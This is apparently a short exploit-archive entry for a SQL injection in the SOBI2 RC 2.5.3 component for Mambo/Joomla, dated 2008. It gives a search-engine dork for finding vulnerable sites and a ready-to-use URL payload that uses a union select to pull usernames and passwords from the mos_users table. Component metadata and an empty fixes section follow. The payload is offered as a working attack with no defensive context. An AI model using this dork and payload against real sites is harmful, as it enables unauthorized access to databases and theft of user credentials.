Mambo Component SOBI2 RC 2.5.3 SQL Injection Vulnerability

2008-02-02 00:00:00

#########################################################################
#
# joomla SQL Injection(com_sobi2)
#
#########################################################################
#
# AUTHOR : DamaR
#
# HOME : http://No =)

#########################################################################
#
# DorKs 1 : allinurl: "com_sobi2"
#
########################################################################
EXPLOIT :

http://site.com/path/index.php?option=com_sobi2&Itemid=27&catid=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*


#########################################################################
# DamaR [email protected]
#########################################################################+

side notes:
<name>SOBI2</name>
<author>Sigrid & Radek Suski</author>
<creationDate>2 November 2006</creationDate>
<copyright>(C) 2006 Sigsiu.NET. All rights reserved.</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

<authorEmail>[email protected]</authorEmail>
<authorUrl>http://www.Sigsiu.NET</authorUrl>
<version>RC 2.5.3</version>
<description></description>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.